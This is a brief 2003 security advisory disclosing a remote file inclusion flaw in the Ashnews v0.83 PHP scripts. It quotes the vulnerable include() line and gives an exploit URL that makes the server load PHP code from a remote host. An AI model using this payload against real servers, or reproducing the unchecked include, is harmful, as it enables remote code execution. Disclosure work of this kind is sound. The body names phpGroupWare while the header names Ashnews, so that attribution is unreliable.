###################################################### ## Name: Phil Dunn ## ## Email: z3hp@yahoo.com ## ## Date: July - 20 - 2003 ## ## Program: Ashnews v0.83 ## ## Version: v0.83 ## ##Vendor Name: AshWebStudio ## ## Vendor URL: http://projects.ashwebstudio.com/ ## ###################################################### An include file vulnerability was found in phpGroupWare. This exploit works for all Branches. A remote user can create arbitrary PHP code and locate it on a remote server. Then, the remote user can issue a specially crafted URL to the target server that specifies the remote PHP code for inclusion. ashnews.php & ashheadlines.php @ line 14 ----------------------------------------------- include($pathtoashnews."ashprojects/newsconfig.php"); ----------------------------------------------- Exploit: http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
